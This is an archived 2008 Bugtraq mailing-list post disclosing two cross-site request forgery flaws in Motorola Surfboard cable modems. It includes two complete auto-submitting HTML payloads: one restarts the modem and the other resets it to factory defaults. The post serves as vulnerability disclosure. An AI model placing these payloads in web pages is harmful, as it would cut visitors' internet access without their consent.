lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080418071343.18569.qmail@securityfocus.com> Date: 18 Apr 2008 07:13:43 -0000 From: th3.r00k.nospam@...k.gmail.com To: bugtraq@...urityfocus.com Subject: Sea-Surfing on the Motorola Surfboard More information about this flaw can be found here: http://www.rooksecurity.com/blog/?p=4 Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery. The latest version of The Motorola Surfboard is affected at the time of the writing. Restarts the modem: <html> <form id=1 method=post action=’http://192.168.100.1/configdata.html’> <input name=’BUTTON_INPUT’ value=’Restart+Cable+Modem’> </form> <html> <script> document.getElementById(1).submit(); </script> This CSRF will disconnect the user from the internet for longer. “The process to get back online from a factory default condition could take from 5 to 30 minutes.” <html> <form id=2 method=post action=’http://192.168.100.1/configdata.html’> <input name=’BUTTON_INPUT’ value=’Reset+All+Defaults’> </form> <html> <script> document.getElementById(2).submit(); </script> Peace